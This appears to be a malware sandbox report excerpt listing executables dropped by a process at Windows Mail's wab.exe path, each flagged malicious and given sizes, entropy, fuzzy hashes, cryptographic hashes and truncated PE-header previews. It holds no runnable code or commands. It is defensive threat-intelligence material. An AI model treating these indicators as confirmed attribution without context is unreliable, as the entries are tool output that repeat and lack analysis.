                                                                                                SSDEEP:1536:sEl9bbS3Vo06gJJRaCAd1uhNRu7z3zHt4s+zbCtbCc0xXNmi9RHYOqEWpVOYlOj:/rkn6gxe7z3OzY+9jTYbE+la
                                                                                                MD5:61B5DB2F53781D6F8236546BA08301C2
                                                                                                SHA1:D9702B47E98A10449322EFD5153CD297FF913D5F
                                                                                                SHA-256:F9732C0E5E5B0DCCE692BD04AFAC17DCB68C9521109D49635D309144077D8323
                                                                                                SHA-512:F2D93CFFA723E19BEFB62B2663DCB4C5DD363F5E3EBC38BC43B853ACEF00C210AA417E753B5A18F7B353CF0EB4123764A99BFC06E416344D7589A52CB3277D40
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):751520
                                                                                                Entropy (8bit):6.454372812643737
                                                                                                Encrypted:false
                                                                                                SSDEEP:12288:1ccV8BFJ0kz4uP9V6wY2M48aVNfffNfYRweSat8UVNfffNfRtAUUn4lDW7f5sBzl:1OFJbl/6r2M48aVNfffNfWVNfffNfDw+
                                                                                                MD5:0F5EA69F9B731ED7976FE7A5BE3112C9
                                                                                                SHA1:F215DEEA7A962AD53918B357D3446C87F20B35DE
                                                                                                SHA-256:FD7C87041D679B9DD33771C07F05E926623285DFBCD03E4C2285872796213643
                                                                                                SHA-512:298081DEAF16A6647C0345931B9E265C0FF62045EDF455F1A05D5A0DF1F926152E4945D707EFD09D0020FE42C798AAD8CEBCD3485DB3EC69201E95BF1357D22A
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):182712
                                                                                                Entropy (8bit):5.991097370883514
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:/rkDDbGpEPwVH+lMCNy0GEVVS1ikLrDdevXqHai8MBEL4:AXSSwVgvfkhvzHcWEM
                                                                                                MD5:2ECB09CF5AC73C6FA0F79F569C5F5E33
                                                                                                SHA1:021A327B831B7274F99D0CC901D53F60C2FD6DEB
                                                                                                SHA-256:67D9B8EE314FFDDCDB506B2406A0DE54FC016CF45BB290F905B0C21E0D1B97F0
                                                                                                SHA-512:C3A3EAEB57F06E8316B0F2A3AE9F53F26A226F1472403A482BF64D25922D53D4AE5407BC0BC3099CFF6016D9CA6023508653D68C0BF67F25627E9492C49F1338
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):5174360
                                                                                                Entropy (8bit):7.254989378596742
                                                                                                Encrypted:false
                                                                                                SSDEEP:49152:Z/xFnOvtaWIDn0apLKkLJU9nU2foKhA4vSWidGHp+NDGQUzbpDOfjxAkrQKl+RPp:LtLK3BDhtvS0Hpe4zbpaAKQkroGIz
                                                                                                MD5:9C81D83BB362C1DE8724A9D0F2FDE901
                                                                                                SHA1:804F2A1A3452F0EE2A2927D2817FDED08537AF86
                                                                                                SHA-256:B620BDB560C23896656F932757F75224BAA4F021EF5273E0E50C2D0589CA0DEE
                                                                                                SHA-512:2BCB260191D9B41C17C2967369F9376032084A2C849DF07C1CB36B0C7BDCDF33CBBF3DF5DC4F1E562608C9B1B33183DCD5E8E7C06907B6DFA8F971D6E600D1C6
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):139712
                                                                                                Entropy (8bit):6.126888776763665
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:/rkyU5adWAKmzUccnzkVBgEuKjj0WWtPPoI:o+EjzCg+j6P3
                                                                                                MD5:01C07B3F77E45B90A01EF08F9085EDAC
                                                                                                SHA1:88E01F7DB25790C04120D1F0B07CE7FEDE5CC00D
                                                                                                SHA-256:1BB7ABD1F7910288188F0E5BF4F47548F5D1DDB8D71DC3A7425BF85E4FE5D1C8
                                                                                                SHA-512:95213B6441F935826322EB8B3B1C77C9E853362FB391014EC440311DC06893D023BC88A57A4FFB7F5C111278C450D1D1B06FCC694FBBF199D4538EC37BB02240
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):380368
                                                                                                Entropy (8bit):6.555084907734949
                                                                                                Encrypted:false
                                                                                                SSDEEP:6144:2zgSb/029S2P/7nzGxFrRN0r0ivCZci1FXiO8DaS4wwE0CBlFJmcx:Nw/2q/roN7ivCZci1FC74wdBlFYU
                                                                                                MD5:AA927AD1ECD836AC249D42BF94DE3A65
                                                                                                SHA1:51FF7EE07974A0BDD31A14E15C652832026C9700
                                                                                                SHA-256:7F7D93ECFB08D1D594AA97FF649C18078A78239E8716F7D4AA369DC5733EAA9F
                                                                                                SHA-512:A942E512BEC89434D862BF09E39C157F6FE1243B31C0719EE5257285ADE088F532F3DAD6AADDC2D9DB29C0D1B26E39DF8B79C825D8721C522E9BD286809AA161
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):1269696
                                                                                                Entropy (8bit):3.675615217628684
                                                                                                Encrypted:false
                                                                                                SSDEEP:6144:Yvk8/0NhFYAddenZhUhTNnLUrh+9nTGLljX4wuSzVF:k4wXF
                                                                                                MD5:B02491C0452A296007FEFEC01AABABFB
                                                                                                SHA1:8E83A59312B8FE84FCAFF98D0A4180A4653BA36D
                                                                                                SHA-256:2458D82B300F063EBDFB5495840EEFBDF86B6A331AE80C4B93C0D007435F372B
                                                                                                SHA-512:E1D9154181404195A0FB1BFF2680F3B534EA248C393623D9E60FC0E5CF7CFDE3C11CEFD7D4F562C176E08856656612E68EA130FE1EBF6F3D66BCF130DD3EC9D2
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):266648
                                                                                                Entropy (8bit):3.885766319937084
                                                                                                Encrypted:false
                                                                                                SSDEEP:1536:sEl9bbS3VodRaCAd1uhNRuiazvhzpwtWhz7I3EWwwrwYx6RPWdn6ysl4DU1:/rkcezzvhF1h3wEWwwbx6ksl4D
                                                                                                MD5:8B9DFC043238EDCB783ECD8C41A25945
                                                                                                SHA1:FE7717581B04B161C6B461B00A614124B6CDA020
                                                                                                SHA-256:09188D2E565E81399A01D92C291905CF50D750534526C03FC2B431EBA7893127
                                                                                                SHA-512:9A17436D210A2B7C124CF89FDF947595D31B381679AFA394CE4CB91FCF867FD630DCDD5A13ECA03CAE77DB09761E86D9F83FC41A4E83D48C1BB1C173F605A75C
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):715760
                                                                                                Entropy (8bit):6.454139818255074
                                                                                                Encrypted:false
                                                                                                SSDEEP:12288:a4tuuLntIMDXw5vde5EFf1Pmbd3lSz3dfp1Swf5M0blmFKuJOJZM30j3:dtFDKMg4iX3djfy0blmFlme303
                                                                                                MD5:23804F478E35BBD0AD391BFA092BDFFF
                                                                                                SHA1:93151FCABF6BB06771C9FD34A51D28F8300AAB3B
                                                                                                SHA-256:62FC292394A77E876CC3F11A17E5A21D1CF799F16D79055FE8F64E8CC240EB97
                                                                                                SHA-512:F674FA98BF32A0A174942E55751CF37BB394B2109A878755144A5924110DCF1C4008DE2EFA1A7690D6058ED19B3EC1235BC134BF722771CC866173EA4D89280D
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):619944
                                                                                                Entropy (8bit):6.5605409599727995
                                                                                                Encrypted:false
                                                                                                SSDEEP:12288:nM/Of/Bboj+clWnIKgrP6TFPLNWuX4Pemn3oi8ky9Q8WSe/aSqizuO1qukdQAPnQ:M8JgryFPLNWuX40RulAPn1OcnGVNfffl
                                                                                                MD5:0B36F896C07E98A40764FE8764947E5A
                                                                                                SHA1:215A5AFC0DE422777682183200EBD4EFF5367268
                                                                                                SHA-256:31B10F09605AF8492130A972EF3801D14E70FF683142EA2934323F3FA9353DF8
                                                                                                SHA-512:2D613456F0C75693A67DAE00656E6C936AB83B577F7C6DB89F3EDC3A57145667AEFFF6A407146A83309C12B49AA0690ABE85A3C4D7E7C673260121ED85189E99
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................

Process: C:\Program Files (x86)\Windows Mail\wab.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 150416
Entropy (8bit): 6.119086865011351
Encrypted: false
SSDEEP: 3072:/rkQQPtLW7twRxI5mc5TNN3AsdVgNwihwT3RqEM6ZOfHXb42:ZQMzhdV0nh4Hof7
MD5: 0A9BABF248FD0BFACE70269A780E12B3
SHA1: 7300CD652E38734C26E4E1BCC6B2CCB06C69D335
SHA-256: D17798E73699309E0889A1C09746EE5F7C4AE74F88BAF39434DAB06025B72535
SHA-512: E3281E6CA9ADDE9542F6E80363D28FA870E16757625A7EB74837AEA773F178EAB17B7DA51DC4780747BCC04F9FC3C98BC379F7AF09C1F54642FA8C15ED414D7E
Malicious: true

Process: C:\Program Files (x86)\Windows Mail\wab.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 264576
Entropy (8bit): 6.453478056220304
Encrypted: false
SSDEEP: 3072:/rkMPuf72UasmkUTFxn40Zo2KoKik9CxIUUksZcRySTn2TGz+WXwMQuDyaqfqORM:l872jsLuLnPo2TTHswP2TGz3FUCHySYI
MD5: FC28EB6FD5C6251911227A55E5F54776
SHA1: 9A3066DE720838BCDE5A0CD3295103DBAE51E980
SHA-256: 5439B9E784639C61CB1089FED2ED359A9CB9BE303CFB5C976E75D60AB929636B
SHA-512: 3DB3DD90B31A176CCF33E7FCCD484A54785E8E33100B88D150BAFA16DB44075A038AA3BCBCF3947799E2C77E69675ED4E90F5E66B1B3A455E1E8A0F30A505EBF
Malicious: true

Process: C:\Program Files (x86)\Windows Mail\wab.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 108448
Entropy (8bit): 5.433980224483478
Encrypted: false
SSDEEP: 1536:sEl9bbS3Vo9weqz1lezmtJwzojsKyyJFGgHZ//rHzb:/rk2qzXe0wSyyJFD//Hb
MD5: 96BEF7D0D48512DC35CDD2D4B1FD6EAD
SHA1: 0EEE984FAC4294D58E25C692C087DFE601D67D01
SHA-256: 00F9AECF764C5846BD073E8C08BB1CB82388123CCE4B05BC518C3914C941E38E
SHA-512: 8B3D4D36DC5D77926EB0EB0A1F98C9D40A97457D9F586E6A722093D0F43321FB4709EB799DE85827C705EDA783C5BA847648D9EBF34B014FD932B21D2D57B9EA
Malicious: true

Process: C:\Program Files (x86)\Windows Mail\wab.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 662600
Entropy (8bit): 5.905694343231267
Encrypted: false
SSDEEP: 12288:Dpo/FEVciSJJtH4PoR6moWEBfQLxZPhEx7xgtV2hv4tkYUK2tlIqR7lmNK/IKrtK:SFEWi4JtH4PoRfoFIxZPk0NKbB0R
MD5: 67BF76A8779842B6187E7EF286154124
SHA1: 2ED18F92D51D677FDC3695406CDA01F5C188E3A0
SHA-256: 3E4B1C352CE41EA00B9A1BFCFEB4693AEE09E27F5B7F2A46CF3CD00A35FA8FBA
SHA-512: A622980F704777BF7115BF9A06AFB89BE0771BC835B11E944A8C592CB3FA05071386ED94547D6159AC03F6F3719AF4726363AC4FC1F0EB10370CB3A4F1A5EF8F
Malicious: true

Process: C:\Program Files (x86)\Windows Mail\wab.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 260560
Entropy (8bit): 5.172772453978791
Encrypted: false
SSDEEP: 3072:/rkp4ZAh7ULoQdHBjw8Q2pFj4+W1ISYpksZmRohnonRBfTjzJEthEWV:cPfQdhMuj4VM8imPjGthEWV
MD5: 9A855D46CF345F40A323616382F3455B
SHA1: 69629A04683AC5A7163F8BBBF1BB2CB823B17D6B
SHA-256: 569B5CC8EF232D6674DBEC8D78F81E70023D6EEABBE974DFC68FF4DB763FEAF5
SHA-512: DB43F60397080E72BCC5A9B8F24E0833EDADE5C85880F357AE50F0604D2DB2235F1D93F089AA57826DE1E82A8719DFF8CA0F502E7AA0AE37E1DB7229DF139751
Malicious: true

Process: C:\Program Files (x86)\Windows Mail\wab.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 4316200
Entropy (8bit): 3.8981940471710472
Encrypted: false
SSDEEP: 98304:pYN3nsBQ5ghvEyqf/whWovz9hRJ5RbisrbdsPO9jXsw:eN3nsBcghvEyqf/whxz9hRJ5Rbisrbdr
MD5: 002CF143B2DB2AD8C0242ADA462F145E
SHA1: 77DE72A11B14F402C4D501C69BC3FD8B51B4642D
SHA-256: 75A84EE4590896B68F4D17E5247BA9C76E2809CEB341EEB201493D617D5C7601
SHA-512: 5BBA377866F2D2AFAC1DFA2201A26A1A1B6491982F0389DCBD5815E6FD9AF7D7110AEC8608926D307437F48501D0E3E4BF89DDA7FEB98214D79B1BFE7510B6BD
Malicious: true

Process: C:\Program Files (x86)\Windows Mail\wab.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 124056
Entropy (8bit): 5.162520482821961
Encrypted: false
SSDEEP: 768:sEl9bbSVh7VWYOzL49oWFGJ+fkSk7Rczjn9znrRtPn9zNU4sm2QBcPOvI:sEl9bbS3VoZwu7mzj9zNtP9zNps8Q
MD5: 3FE3567269EE2A38998100DD56D0C35A
SHA1: 273677012FE63C88B051D56028DD6915167FBCE5
SHA-256: DDB5B86E768F863A56B8B4B717CFBF59A187EF8B1AFA841F7B72237C79A32DB8
SHA-512: 00A60C9395844CC8DE48DA167E00369E7AAEC59A06F31869CB19DCF86C0BEF5A18EA0C141F408DEEF7DE0A935EB0CDAD27790377258717A1DF592E677B79E0FE
Malicious: true

Process: C:\Program Files (x86)\Windows Mail\wab.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 358336
Entropy (8bit): 4.285457679979659
Encrypted: false
SSDEEP: 6144:/yUkKOEEIK128d2VKjw0EYsfZJnPmTuJjac2a51lHpLszc/kzY56Y:/x/B/kib
MD5: 1A65939043DF2CEAD4643A92E4976D91
SHA1: B04C8E1BAB15CE5F05071904D4DFD5DA7188EF72
SHA-256: A813B53FB7C77DBE4E67D76A488C2B53A298824A6A1BB010FF55FDECFF7A7082
SHA-512: BE08E9D6315BDAC96667D3FD36B785EC35F35BD25C7EB6A9421DE403430552F1695707B083C3CA99E30D4FDA33A0A71E10DEA89E65BBFB91FAD35D237B5D45C3
Malicious: true

Process: C:\Program Files (x86)\Windows Mail\wab.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 763032
Entropy (8bit): 4.0026170623684765
Encrypted: false
SSDEEP: 3072:/rkcwRnjnzhCiXXXXXX1AzZwAazTwdOLxN1IHO:TwRnj7XXXXXXSzuz8OZ
MD5: 5B45157A040A388147F2A881D0DD0AD5
SHA1: 413FD5E5DB3174D558F3EBE70688A5C41E5DE109
SHA-256: BF906BC259DBEB8D7B45F8CC41A7A7C26576B018AFCD7EE7DC7F2743F8375CE2
SHA-512: 5B0E915CDCF2F844AE8C5E10D9282382DD3198C8EB67556774DAA85225128307D958D0A457E89EEE66FB87DCBB1FEAE4DF85EC52364930FA58E45DACBC5D9D27
Malicious: true

Process: C:\Program Files (x86)\Windows Mail\wab.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 895120
Entropy (8bit): 2.860376586914997
Encrypted: false
SSDEEP: 3072:/rkofCEq7tOxIfMFzCEpAm/4rx7z1arf+9:az8w
MD5: DE69185016C6898EB989FF0FFE42D0F3
SHA1: AF2EBD25315FFC7C3C2981DE9371D0827B8AF7D5
SHA-256: FF89208A70C006CF7CDC585CA29387C24CEEBE2FC239D0D16EBBBBE2DE672899
SHA-512: E2B300286DBE9F7A5635BFEE07C03D2E5FC21A9B658CB5E69ABB0A071A15F7B9781C37B9E64C935F8AD54D205AA221D7D679C9D7D1C062426795C279FC5245A9
Malicious: true

Process: C:\Program Files (x86)\Windows Mail\wab.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 1082008
Entropy (8bit): 3.688463156686676
Encrypted: false
SSDEEP: 3072:/rk2o4TUawK1uT040i0ougmQmJDJnJ+20FxPlJPPSSfzZ9Ar9oN:I243xmQm59UtUSfz3
MD5: 3A47AB68F40340B1078860C968FE8489
SHA1: D3DBB2A372C6029BE19317E59B7EF37E2C9361A5
SHA-256: 45C4B4E0A6EFBA693B88B201A7BF6B1B6AA1B468DBED7108F059A694E4EB024C
SHA-512: 0A4F4305AEA86FCDCEF65D5665BD9573692B6507A79AA0EE64973AF561E065A22A14B706A17C787DF220850ECA701CBA463D800F3693D74FF842C3011B995266
Malicious: true

Process: C:\Program Files (x86)\Windows Mail\wab.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 105440
Entropy (8bit): 5.4479881956053084
Encrypted: false
SSDEEP: 768:sEl9bbSVh7VWYOzL49oWQrkw1jL9zxwKeL9zgt5tjTh7D9:sEl9bbS3VoVjhzxwKehzgt5t1D
MD5: D1346C4098D16AC440D5665B99AD4299
SHA1: 08EF1AC534221589574D4EA2FCD222CB099680DC
SHA-256: B8F1B885A5DEDF6893C175CFBA736CDAD9065EF21DD0CDB9BF692E190939657E
SHA-512: 4F44966E22DEAAD0597A2EF3A0BDB73228D5AD4BE2DF28B9163A3148AC7F11BD322B71198B1FC9281229C03BA0566ADB9D43DE4E390C460EAF3922B8BFDE34A9
Malicious: true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):537536
                                                                                                Entropy (8bit):4.820102239387087
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:/rkHPMMRMMMmMMMvMMMwMMMNMMMWMMM3MMsewVOOMzMMvMMOMMMJMM2MMQM6k7uD:TwVR6V7byjUWAZyVVdz8eEdGo
                                                                                                MD5:1C214A282C02A2210D46E12AD1644AF9
                                                                                                SHA1:4BA7AB5B9869DA21718783ACF5890F5536C75673
                                                                                                SHA-256:FF47F769CFFF7BC22EFDC90931AA634879F761EE5D8CDF421062405D0460CE88
                                                                                                SHA-512:9260337144393E67C25B28042C25C473117E2E8ED58D16B152D942CA8445DE7D7ECEB4AA7C13CCAFE7C062EC9C872BB3022260061233C30D90DE6F324D417EFE
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):1271952
                                                                                                Entropy (8bit):4.010875755285499
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:/rkj3ppPpNpDpspp/pCp0pmppdpspppRppMpLp0ppppbpQp2pphpSpXpQppaplpG:TKQSNdhnSzv
                                                                                                MD5:9DE7FBDFAAFCC0160D5681DF12BB69D6
                                                                                                SHA1:4FA77F76857F535B821279F049B790A51E9A8BDB
                                                                                                SHA-256:1AA9AFEA2C76C14A0E0079F3985BF54A7FCFB63E4978FE2520BC291A235F6CE1
                                                                                                SHA-512:A8E168D8564892C8D9CDD30C2B7FF38DA77F5B4088861D6169E9810C423FE90C41FDBB2E124849B266944401E4ECF28A35361B2E89D738567028E2F2F835F3A3
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):4099760
                                                                                                Entropy (8bit):3.693585524111332
                                                                                                Encrypted:false
                                                                                                SSDEEP:12288:IBKs7fvZIFpCYVIVN2mGsb8HtVLaHw3j4cLbUBRjLFP29DyZbT9gb/m06aCzE6h9:IBKszX0FjOeblHiled/k
                                                                                                MD5:4FEED17F8FC70D5BB28C4862D6A889F0
                                                                                                SHA1:1F22653E28C40C5E1DCA3359E8D09201F826CADA
                                                                                                SHA-256:2D07C962AFC6E270F04FC82EA4E80D207722AD4064E3B4C3DD58C01FD28C9FD9
                                                                                                SHA-512:7BAA4F2A7B38742A00D879079DC0505A16D49261163FC0BDB21BD2709EC91310F15FA1BA0AD0AF053BDC2F341EB0A7B8AD536A6B2DBA88BA1AEF4D2643871269
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):1273488
                                                                                                Entropy (8bit):4.248522979382886
                                                                                                Encrypted:false
                                                                                                SSDEEP:1536:sEl9bbS3VoFqYvbZthqyEATS583ONoTqzaezuC8zFtxzzqO9uF:/rkt6bZt+ATS583ONo4aezJ8ZfqiA
                                                                                                MD5:EAEADD9008A5081007BD4EC21056B686
                                                                                                SHA1:6E6FAF94275ECD60262A054AFAB6FB2EB9407FB9
                                                                                                SHA-256:5F97D3C8153157B4735B36EA3E6017A8977BF6F094285ADC5F4229490E3DFF64
                                                                                                SHA-512:0E991651B2F43B0DE5D43CE1E13CD20B8127FBE7C730F649097B8F380E19198C48E9AA73B597B8BE6A9A02650E0EE84FC37D5876B6A5C0A85551E03BB76AFD90
                                                                                                Malicious:true
                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D.............................................................%.............Rich....................PE..L....X8..................*..........00.......@....@..........................0......t.....@...... ..........................4Q.......p....................... ......0...T...................|........................P..0....8..@....................text....(.......*.................. ..`.data........@......................@....idata.......P.......0..............@..@.didat.......`.......:..............@....rsrc........p.......<..............@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................................
                                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                Category:dropped
                                                                                                Size (bytes):124056
                                                                                                Entropy (8bit):5.162520482821961
                                                                                                Encrypted:false
                                                                                                SSDEEP:768:sEl9bbSVh7VWYOzL49oWFGJ+fkSk7Rczjn9znrRtPn9zNU4sm2QBcPOvI:sEl9bbS3VoZwu7mzj9zNtP9zNps8Q
                                                                                                MD5:3FE3567269EE2A38998100DD56D0C35A
                                                                                                SHA1:273677012FE63C88B051D56028DD6915167FBCE5
                                                                                                SHA-256:DDB5B86E768F863A56B8B4B717CFBF59A187EF8B1AFA841F7B72237C79A32DB8
                                                                                                SHA-512:00A60C9395844CC8DE48DA167E00369E7AAEC59A06F31869CB19DCF86C0BEF5A18EA0C141F408DEEF7DE0A935EB0CDAD27790377258717A1DF592E677B79E0FE
                                                                                                Malicious:true
